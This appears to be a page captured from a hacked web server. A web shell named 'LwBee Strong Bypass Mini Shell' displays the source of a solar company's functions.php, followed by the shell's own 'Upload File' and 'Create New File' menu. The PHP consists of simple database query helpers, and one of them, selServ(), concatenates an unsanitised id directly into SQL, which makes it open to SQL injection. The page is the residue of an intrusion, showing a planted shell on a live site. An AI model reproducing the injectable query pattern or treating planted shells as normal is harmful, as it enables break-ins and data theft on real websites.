/home3/vehiclea/public_html/suryasolarsystems/functions.php
<?php 
  ob_start();
  session_start();
include 'include.php';  
  function select_topBar(){ 
   $select_topBar = executework("SELECT * FROM topbar  order by id desc limit 1");
   return $select_topBar;
 }

 function select_features(){
      $select_features = executework("SELECT * FROM portfolio  order by id desc");
      return $select_features;
    }

    function select_ourteam(){
      $select_ourteam = executework("SELECT * FROM ourteam  order by id desc");
      return $select_ourteam;
    }

     function select_ourteamLimit(){
      $select_ourteamLimit = executework("SELECT * FROM ourteam order by id desc limit 3");
      return $select_ourteamLimit;
    }
    function selectService(){
      $selectServ = executework("SELECT * FROM services  order by id ASC");
      return $selectServ;
    }

    function select_project(){
      $select_project = executework("SELECT * FROM projects order by id desc");
      return $select_project;
    }
     function select_projectLimit(){
      $select_projectLimit = executework("SELECT * FROM projects order by id desc limit 3");
      return $select_projectLimit;
    }

     function select_about(){
      $select_about = executework("SELECT * FROM about order by id desc limit 1");
      return $select_about;
    }

      function select_testimonial()
      {
      $select_testimonial = executework("SELECT * FROM testimonials order by id desc");
      return $select_testimonial;
    }

        function select_slider()
      {
      $select_slider = executework("SELECT * FROM slider order by id desc");
      return $select_slider;
    }

     function selServ($editId){ 
   $selectServEdit = executework("SELECT * FROM services where id ='".$editId."'");
      return $selectServEdit;
  }



@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File